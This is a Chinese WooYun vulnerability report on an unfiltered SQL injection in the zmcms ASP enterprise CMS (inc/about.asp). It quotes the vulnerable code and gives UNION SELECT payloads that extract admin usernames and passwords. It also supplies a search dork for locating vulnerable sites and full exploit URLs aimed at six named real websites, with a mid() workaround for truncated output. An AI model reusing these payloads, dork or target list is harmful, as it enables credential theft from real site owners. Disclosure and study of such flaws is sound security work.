WooYun.org

追梦企业网站管理系统（zmcms）是由追梦工作室基于asp+access/mssql自主研发而成。我们致力于中小企业网站的搭建。根据现有企业的需求。开发适合企业的模块，让企业可以轻松搭建适合自己企业的网站，后台功能强大，管理便捷。代码简单易懂，适合二次开发。我们认为“简单就是美”，因此一直以来，追梦工作室在开发过程中无处不充分考虑用户的使用习惯，尽最大可能降低用户的使用门槛，让用户关注于内容维护本身，而不需要投入过多的时间来学习系统的使用技巧，在细节处下大工夫。..
看到 inc/about.asp

<%
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset") 
sql="select * from dy where id="&id
rs.open sql,conn,1,1
id=rs("id")
title=rs("title")
content=UBBCode(rs("content"))
gjza=rs("gjz1")
msa=rs("ms")
zdfy=rs("zdfy")
zmone=rs("zmone")
if rs.eof and rs.bof then
Response.Write("<script language=javascript> alert('信息内容已被删除!');window.location.replace('index.asp');</script>")
end if
%>

直接将id带入了sql语句，没有过滤。类似的文件在 inc文件夹下还有很多。
前台 about.asp

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!--#include file="Inc/sub.asp" -->  
<!--#include file="Inc/about.asp" -->

包含了进来。
exp

about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
about.asp?id=%201%20union%20select%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
没显示全的话 就用 mid（）。

虽然漏洞挺简单的。但是用户量还是蛮多滴。。。
关键字 inurl:"product.asp?pone="

5个实例用以证明通用。

http://www.whhnt.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.qqlqq.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.sl138.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.it8088.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.hqgg.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
特殊例子。2的位置显示不出来的话 就用3来显示 需要mid
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,username,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,mid(username,4,5),4,5,6,7,8,9,10,11,12,13,14%20from%20admin